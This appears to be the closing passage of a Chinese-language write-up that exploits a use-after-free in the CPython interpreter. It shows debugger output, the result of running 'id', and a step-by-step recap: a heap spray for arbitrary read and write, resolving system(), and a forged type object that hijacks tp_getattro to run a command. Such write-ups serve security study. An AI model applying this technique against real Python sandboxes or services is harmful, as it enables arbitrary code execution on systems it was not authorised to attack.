*RDI 0x7ffff74acae0 ◂— 0x6469 /* 'id' */ ← fake_obj,INCREF 后已为 'id'
*RSI 0x7ffff7505990 ◂— 0xffffffff ← PyUnicode "pwned"
RIP 0x504607 (PyObject_GetAttr) ◂— endbr64
执行结果:
uid=1000(ivan) gid=1000(ivan) groups=1000(ivan),27(sudo)
收尾:完整 exploit 流程回顾
从 UAF 触发到命令执行,没有 shellcode、没有 ROP,全程利用解释器自己的 C 函数指针调度:
- fake_ba 堆喷把一个
bytearray的 ob_bytes 改成 NULL,ob_size 改成 MAX → 物理内存窗口打开 - r64/w64 通过 bytearray 下标访问实现任意地址读写
- ELF base 从
PyLong_Type.tp_dealloc指针反推 - system() 通过 ELF 的 PT_DYNAMIC → rela.plt 在运行时解析
- fake PyTypeObject 把
tp_getattro填成system() - ob_item 覆写 让
payload[0]指向一个伪造的 Python 对象,该对象的 ob_refcnt 处存着命令字符串 - INCREF trick 利用 Python 的
BINARY_SUBSCR自动 INCREF,把命令第一字节从'h'(0x68)变成'i'(0x69) - payload[0].pwned 走
PyObject_GetAttr → tp_getattro(obj) → system("id")
(完)